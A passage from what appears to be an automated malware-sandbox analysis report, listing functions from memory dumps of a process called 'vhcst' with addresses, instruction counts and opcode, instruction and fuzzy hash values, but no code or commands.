                                                                                      • Instruction ID: 311bf9f7ec316c82d4a994f167eb642d0bba5ecff38ec819ba1c7bbd56fd1ecf
                                                                                      • Opcode Fuzzy Hash: 14d57c057ca5059d9141a60b7e6bbe653a264337fb4445e794a6878c385c0277
                                                                                      • Instruction Fuzzy Hash: 2AC08013A5AF1D06E664554874515EDF3C0EFB4395F8103B6F044D1195DC4B6893C1C3
                                                                                      Function 00007FFD99E10C57 Relevance: .0, Instructions: 16COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c50297b2062a75824498806e8ba5037a6ddbbfe2ef8b5abec58777de0595d98b
                                                                                      • Instruction ID: cce907de919db462496fd9d0dcac8b74667b44b8ac92543a6a364fef783741e3
                                                                                      • Opcode Fuzzy Hash: c50297b2062a75824498806e8ba5037a6ddbbfe2ef8b5abec58777de0595d98b
                                                                                      • Instruction Fuzzy Hash: 79D05E3152CB098BD354DF14E4508DAB7A0FF84330F840B2DF06EC61D5DE75A6818686
                                                                                      Function 00007FFD99E2832A Relevance: .0, Instructions: 16COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dddc213176469bc243a3c54a8bf896c9ed1de67d5687f688e75de94bd38a1ab2
                                                                                      • Instruction ID: d6446351aaba1381580757c08b12ecdb99333b85395bc8e6811d70f8915616c8
                                                                                      • Opcode Fuzzy Hash: dddc213176469bc243a3c54a8bf896c9ed1de67d5687f688e75de94bd38a1ab2
                                                                                      • Instruction Fuzzy Hash: 92C0121264AA0E06FA709A88B4A16EAB3C0EFB5751F5106BAF09481196ED1A64428682
                                                                                      Function 00007FFD99E2481A Relevance: .0, Instructions: 16COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: e704c7b07b5e68e1e02f802b50d1375fa2183302b03001a60153f9cd1ef72a9c
                                                                                      • Instruction ID: 13b5684eac7e780e49592b2eb2d480d9f92dd03619c16860f1b01e9d6277987b
                                                                                      • Opcode Fuzzy Hash: e704c7b07b5e68e1e02f802b50d1375fa2183302b03001a60153f9cd1ef72a9c
                                                                                      • Instruction Fuzzy Hash: 5CD01352B5D55617E964948570A15ED63C097743D9F400075F04DC5195FD4F75834182
                                                                                      Function 00007FFD99E1D65C Relevance: .0, Instructions: 15COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 161310d7f156faa14e878bfdd0f4cf8d5bcdeeb44a0cb7067e88f082aba4aa2a
                                                                                      • Instruction ID: 9cbe3244ea78298810dfaabfdb7a7e156d798e944efc3c0b8a7a3dca95914e08
                                                                                      • Opcode Fuzzy Hash: 161310d7f156faa14e878bfdd0f4cf8d5bcdeeb44a0cb7067e88f082aba4aa2a
                                                                                      • Instruction Fuzzy Hash: 03C02B53B1AD0E03D6D4890C74558E6B3C2E6F4150F801723F06DC7158DC4B5C834382
                                                                                      Function 00007FFD99E23E3F Relevance: .0, Instructions: 15COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: dec30e79f8560c8e96262b57ba1453e8c7a7d02154829d237358688282c45b5c
                                                                                      • Instruction ID: 2e5493a4b53445a16de96578cc33cd7d8fae5fe8e778a72a49c40022a17a1842
                                                                                      • Opcode Fuzzy Hash: dec30e79f8560c8e96262b57ba1453e8c7a7d02154829d237358688282c45b5c
                                                                                      • Instruction Fuzzy Hash: E9C08C1364AB0D0AEAA1884CB4516EEB3C0DBA46A0F9406BAA0A486195DC1F58874682
                                                                                      Function 00007FFD99E29E1A Relevance: .0, Instructions: 15COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 1ac38fed335be374ab728b539589ea2265aaa4015c48798f00453d6b7f0f494c
                                                                                      • Instruction ID: 943936990e9c02888ace8c6cc560abc801cb21dd399196054a19ae051c75d392
                                                                                      • Opcode Fuzzy Hash: 1ac38fed335be374ab728b539589ea2265aaa4015c48798f00453d6b7f0f494c
                                                                                      • Instruction Fuzzy Hash: 52D01273B49B0A4AEA68CD84E4A26ADB3D0DBA0345F9405B9E04985199D91EA482C242
                                                                                      Function 00007FFD99E259E4 Relevance: .0, Instructions: 14COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 32b1e7d094bdf0abe169121fea4af46f6d1ad4a64651dd0bb308374ecacb9e0a
                                                                                      • Instruction ID: 5a0ed5a585d5498de754ac1c987e1b6789aca04c5fb1627620a28fd5060943c3
                                                                                      • Opcode Fuzzy Hash: 32b1e7d094bdf0abe169121fea4af46f6d1ad4a64651dd0bb308374ecacb9e0a
                                                                                      • Instruction Fuzzy Hash: DDC09B51B1D91906F57069DC7CD21BD9381D7C45357545777D40DC129ECC1E688501C7
                                                                                      Function 00007FFD99E259D4 Relevance: .0, Instructions: 14COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: bb09a7f71ba9b5b4339306e90d008acadb26c9ff9ec808b2db1488d6ed546693
                                                                                      • Instruction ID: 3d907e6f1b8f71c14c88e9ff41192f90f784bbc82e7578507e31747fd89fc0fd
                                                                                      • Opcode Fuzzy Hash: bb09a7f71ba9b5b4339306e90d008acadb26c9ff9ec808b2db1488d6ed546693
                                                                                      • Instruction Fuzzy Hash: 0AC09B55B1D91A06E57069DC7CD21BD9381D7C45397545A77D40DC129ECC1E684501C7
                                                                                      Function 00007FFD99E259C4 Relevance: .0, Instructions: 14COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: fc456586e50cc14e0498ada033911a587812b2f40a810d882d7550fc9da16711
                                                                                      • Instruction ID: 7011b75e2a00ff8d391462dd2c30e9f417363d6b005d0c51e8fb50bfb7e8f54d
                                                                                      • Opcode Fuzzy Hash: fc456586e50cc14e0498ada033911a587812b2f40a810d882d7550fc9da16711
                                                                                      • Instruction Fuzzy Hash: 79C09B11F1D91906F57059DC7CD21BD9381D7C45347641777D40DC128DCC1E688101C7
                                                                                      Function 00007FFD99E1090A Relevance: .0, Instructions: 14COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 9e9dc381ffb6e46f349ddc9e930624cc11be5211f7a004c3154924b2d9520495
                                                                                      • Instruction ID: e218d6bba87b0aba2edc1d206fba19b09f2089688cdae69d17d87de307abd7a1
                                                                                      • Opcode Fuzzy Hash: 9e9dc381ffb6e46f349ddc9e930624cc11be5211f7a004c3154924b2d9520495
                                                                                      • Instruction Fuzzy Hash: E2C0123365C6094AC711A654E4A1CEEB360EF942A8F440B3AF04A910A5DD5967858682
                                                                                      Function 00007FFD99E226D0 Relevance: .0, Instructions: 14COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 221a8bb5a2db97931f597174371ab97b200d4d19ef9b4a002dc911f5c9832260
                                                                                      • Instruction ID: b7a850c31e20c3e63a41c360ede0050da3f5790b4b319e8bc6992037d75d93f6
                                                                                      • Opcode Fuzzy Hash: 221a8bb5a2db97931f597174371ab97b200d4d19ef9b4a002dc911f5c9832260
                                                                                      • Instruction Fuzzy Hash: 32D02353D0E58007DF654E7C95F106577505F52104B4405B1F444451C7EC155C45C343
                                                                                      Function 00007FFD99E25AA0 Relevance: .0, Instructions: 13COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 04d20ca7ec99e0150d162f76b29b3043bfba6f974635f7e689834bd2e8a02ffa
                                                                                      • Instruction ID: 84cd912cfcff614a77deefd9f81dc1c19a571cb712148f7edfd7cea9e30e0b8f
                                                                                      • Opcode Fuzzy Hash: 04d20ca7ec99e0150d162f76b29b3043bfba6f974635f7e689834bd2e8a02ffa
                                                                                      • Instruction Fuzzy Hash: 01C02220B0AC2C0A02B8E02E2888A3A00C2CBCC22030802ABA00CC3288CC000C0203E2
                                                                                      Function 00007FFD99E25567 Relevance: .0, Instructions: 13COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c18751c6a86fe4545d91ba5b3711b9149bf18071c1a90099f90490faf681a263
                                                                                      • Instruction ID: 128a1d2f05fc7b2fa99c71397b3614065d7c3cf2f11b5be2eb0651f4987c1114
                                                                                      • Opcode Fuzzy Hash: c18751c6a86fe4545d91ba5b3711b9149bf18071c1a90099f90490faf681a263
                                                                                      • Instruction Fuzzy Hash: 69C08053F4D88626DB615D98E9D11F93351EFB1600B440575F0DD41245DC15998357C2
                                                                                      Function 00007FFD99E13EE3 Relevance: .0, Instructions: 13COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d081ab9ec2dbe3fe7327989bc4267cc35c3a100408fa9707334a363d236b1eab
                                                                                      • Instruction ID: 86f0d8cdc20325a5cf3b98a85414edbbfa7aedb79c05917485f0c76ef24b12f5
                                                                                      • Opcode Fuzzy Hash: d081ab9ec2dbe3fe7327989bc4267cc35c3a100408fa9707334a363d236b1eab
                                                                                      • Instruction Fuzzy Hash: 34C0123252C54A57D385A740E4518EF7390BF90204F801B39F04A850D9DD59A6458583
                                                                                      Function 00007FFD99E24ED0 Relevance: .0, Instructions: 10COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 79afb9f9accafda65eb51254b587584eb4c63494b03122229d186999ef5962c4
                                                                                      • Instruction ID: 1c5802804c65ba36d91d616ce749aa80b887b67c274279c06cd83ad2c758e9d4
                                                                                      • Opcode Fuzzy Hash: 79afb9f9accafda65eb51254b587584eb4c63494b03122229d186999ef5962c4
                                                                                      • Instruction Fuzzy Hash: 3EB09233B4F10A85EB2018C474A20FDF310DB8123AFA00233D20E810424D0722A54193
                                                                                      Function 00007FFD99E22045 Relevance: .0, Instructions: 9COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 0eae9b0286c16d23a9ed2c9c20d00e4a34ec48259d0caf6326cfd71676d81c9b
                                                                                      • Instruction ID: 2dcd26a9c0537090b070ede296b1e267a2f472c35659993f7a416159459869ed
                                                                                      • Opcode Fuzzy Hash: 0eae9b0286c16d23a9ed2c9c20d00e4a34ec48259d0caf6326cfd71676d81c9b
                                                                                      • Instruction Fuzzy Hash: FAB01233B86409449B3005C474520FDF310D7C013BF100133C30D810008503102546C2
                                                                                      Function 00007FFD99E1D7FA Relevance: .0, Instructions: 6COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b73656ccb9c54c143f8768e1a37ddcdd8abbef968b3860c30b144a21026c9be7
                                                                                      • Instruction ID: 0c93a5011438a7e770fa0bfc2f57ed78a9c793e261167744d115ad5a7168e97b
                                                                                      • Opcode Fuzzy Hash: b73656ccb9c54c143f8768e1a37ddcdd8abbef968b3860c30b144a21026c9be7
                                                                                      • Instruction Fuzzy Hash: CCA02232C8B00CA3CF300C8038820F83300EB02328F000023E80E020008B23A2300082
                                                                                      Function 00007FFD99E249CD Relevance: .0, Instructions: 2COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 15e1bfc7ec958214be8dd0a7d5ceb07266cd12ac74fa0af1a83786b237e22bea
                                                                                      • Instruction ID: 10562aa8eed32f4f21c8babd71b4a8674c907bb5b2435a441c908df5c789eb3d
                                                                                      • Opcode Fuzzy Hash: 15e1bfc7ec958214be8dd0a7d5ceb07266cd12ac74fa0af1a83786b237e22bea
                                                                                      • Instruction Fuzzy Hash:
                                                                                      Function 00007FFD99E1F488 Relevance: .0, Instructions: 1COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d583eb90a5f6679517b77fe220de72d39d480a88f2e74cc9162a958c44e083aa
                                                                                      • Instruction ID: 4c09d0ffb5c2ceec775656008ccc07a9cca0ae8c1827b1611bfa94c88247a6ac
                                                                                      • Opcode Fuzzy Hash: d583eb90a5f6679517b77fe220de72d39d480a88f2e74cc9162a958c44e083aa
                                                                                      • Instruction Fuzzy Hash:

                                                                                      Non-executed Functions

                                                                                      Function 00007FFD99E21268 Relevance: 1.4, Strings: 1, Instructions: 199COMMON
                                                                                      Download Yara Rule
                                                                                      Strings
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID: 1N_^
                                                                                      • API String ID: 0-2720521594
                                                                                      • Opcode ID: 2be94b2fb938db38f4e90838b214064e82e097044a32476cd342cbc5ca9d8491
                                                                                      • Instruction ID: 1d04e641a2b728a4c5988a93d15ff61ebc0d1343b70a44ef66fe890b52f345e9
                                                                                      • Opcode Fuzzy Hash: 2be94b2fb938db38f4e90838b214064e82e097044a32476cd342cbc5ca9d8491
                                                                                      • Instruction Fuzzy Hash: 8B51DC27F0E2A18BEB11BEBCA8B61D67BD1DF4326C70D40B7D1D4C9497EC09754A8286
                                                                                      Function 00007FFD99E309B0 Relevance: .7, Instructions: 726COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2252339829.00007FFD99E10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99E10000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99e10000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 236722b1ef219386b7f0bd309db0d122929427d7b414b953f60af8f976ef6019
                                                                                      • Instruction ID: 098a1162b785cf4c097e2cea388c0e27e05f1b5e5b1e4d0187f83674a3bc65f0
                                                                                      • Opcode Fuzzy Hash: 236722b1ef219386b7f0bd309db0d122929427d7b414b953f60af8f976ef6019
                                                                                      • Instruction Fuzzy Hash: 72129831B1DB494FE768DE9C98961B1B3D0FB95324B14427ED08AC3296DE26F8438783
                                                                                      Function 00007FFD99FDBF51 Relevance: .4, Instructions: 432COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2258063864.00007FFD99FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99fd0000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a69778c4dc1a5ed9c7701fc95ff4132a73f47807cb4afbf08e49d325c05f9fdd
                                                                                      • Instruction ID: 85e7c8f659e114b2a3af8717967335c06fa604181dc7af98baaa33b03f3d1af1
                                                                                      • Opcode Fuzzy Hash: a69778c4dc1a5ed9c7701fc95ff4132a73f47807cb4afbf08e49d325c05f9fdd
                                                                                      • Instruction Fuzzy Hash: C4D13921A0C6890FE759AFBC54622B9BBD0EF4A314F1806BDD4D9C71D7ED2968428342
                                                                                      Function 00007FFD99FD0FA9 Relevance: .4, Instructions: 353COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2258063864.00007FFD99FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99fd0000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: a2d9b717b5235096e250c7fb5c704fe083f50df10582fcce498eaee1a47f1f86
                                                                                      • Instruction ID: 9520fa1d64ed417b549b12b7cdcfe4b135eb74b8ff44d2b69a8cc99a9c715719
                                                                                      • Opcode Fuzzy Hash: a2d9b717b5235096e250c7fb5c704fe083f50df10582fcce498eaee1a47f1f86
                                                                                      • Instruction Fuzzy Hash: EEA12822B0D5964FE7A5FF7C98A85E5BBD1EF4621830D42F3D09CCB1A7DE14A8458382
                                                                                      Function 00007FFD99FD1898 Relevance: .3, Instructions: 338COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2258063864.00007FFD99FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99fd0000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: ac51db956454efc90ba35ade87984eba42b9fbd5c99ce91d4062f2f33fea9b34
                                                                                      • Instruction ID: 5a6eb709ced5bc8bbc26956e3364c2090b1a69460840b870637e0e93740974f4
                                                                                      • Opcode Fuzzy Hash: ac51db956454efc90ba35ade87984eba42b9fbd5c99ce91d4062f2f33fea9b34
                                                                                      • Instruction Fuzzy Hash: A1A12752B0FAC60FF769CEB88864164BF91EF5626470843BAD09C871DBD919AD49C383
                                                                                      Function 00007FFD99FDAA40 Relevance: .3, Instructions: 332COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2258063864.00007FFD99FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99fd0000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: 597f407d02780d9a299312aaeaf58b7635d3a1b13dadbe2e8a329d5a994a70ae
                                                                                      • Instruction ID: 27a5e749e13ff5816510a1a2e8b76a61f08a81bb79e1c91d531c7518aae53253
                                                                                      • Opcode Fuzzy Hash: 597f407d02780d9a299312aaeaf58b7635d3a1b13dadbe2e8a329d5a994a70ae
                                                                                      • Instruction Fuzzy Hash: A6B1D430B18A494BE764EF69C061ABAB3D1FF89318F14077DD49FC76D6DE28B8418642
                                                                                      Function 00007FFD99FDFAA5 Relevance: .3, Instructions: 280COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2258063864.00007FFD99FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99fd0000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: d3af8bf45c6b6a03fc22edfdd316f6e2df922993346f7581cfd1ebaab06843a7
                                                                                      • Instruction ID: 109f0236c576131f1785ea1b45e2691fccf9e1c511c93bc9f6f0865eb108a90b
                                                                                      • Opcode Fuzzy Hash: d3af8bf45c6b6a03fc22edfdd316f6e2df922993346f7581cfd1ebaab06843a7
                                                                                      • Instruction Fuzzy Hash: 5281B917E0E2D397E351BEB8A8754E63F90DF4222C71D92B7D0DC490E7ED09614A8196
                                                                                      Function 00007FFD99FDFD18 Relevance: .3, Instructions: 265COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2258063864.00007FFD99FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99fd0000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c9c7048f9100685e1a0c455fb619aca3cdc1ec615251d8fe2cae459c48ab9e2d
                                                                                      • Instruction ID: 005f73e5964f2b153778fd565ff034efb12926e42e38ad48046a5ca158e30044
                                                                                      • Opcode Fuzzy Hash: c9c7048f9100685e1a0c455fb619aca3cdc1ec615251d8fe2cae459c48ab9e2d
                                                                                      • Instruction Fuzzy Hash: 04816C22F0C6969BD741BF78E8659E677A0FF4532CB0C8276D0D8CA1DBDA24B446C781
                                                                                      Function 00007FFD99FDFB58 Relevance: .2, Instructions: 193COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2258063864.00007FFD99FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99fd0000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: b72ef9d7fbac154258f8c0fda886ccf7f906ad11215bb991239c2123d26dc18f
                                                                                      • Instruction ID: 19d917959a1e9a08f8d8e783c645bcf178219c731eaf2b6a4a0fd7c48a55f4de
                                                                                      • Opcode Fuzzy Hash: b72ef9d7fbac154258f8c0fda886ccf7f906ad11215bb991239c2123d26dc18f
                                                                                      • Instruction Fuzzy Hash: C1519917E0E2D397D341BEBCA8B54E73F908F4226C71D92B7D0DC490EBED0961568196
                                                                                      Function 00007FFD99FDABF2 Relevance: .1, Instructions: 105COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
                                                                                      • Source File: 00000006.00000002.2258063864.00007FFD99FD0000.00000040.00000800.00020000.00000000.sdmp, Offset: 00007FFD99FD0000, based on PE: false
                                                                                      Joe Sandbox IDA Plugin
                                                                                      • Snapshot File: hcaresult_6_2_7ffd99fd0000_vhcst.jbxd
                                                                                      Similarity
                                                                                      • API ID:
                                                                                      • String ID:
                                                                                      • API String ID:
                                                                                      • Opcode ID: c4eb734d926ed7a30a7ef29d241931c5c03e7a31830cc37bf4e32ac654b92ca2
                                                                                      • Instruction ID: 884ff28d1cded49fefcd885623f13bc8768992077aef2ab90f35a4d82e7f2054
                                                                                      • Opcode Fuzzy Hash: c4eb734d926ed7a30a7ef29d241931c5c03e7a31830cc37bf4e32ac654b92ca2
                                                                                      • Instruction Fuzzy Hash: 1E318021A8D792BBD3407F74DCD6CD33B90EF4132C32E41B2D0948E467DA0AA092C791
                                                                                      Function 00007FFD99FE2D15 Relevance: .1, Instructions: 101COMMON
                                                                                      Download Yara Rule
                                                                                      Memory Dump Source
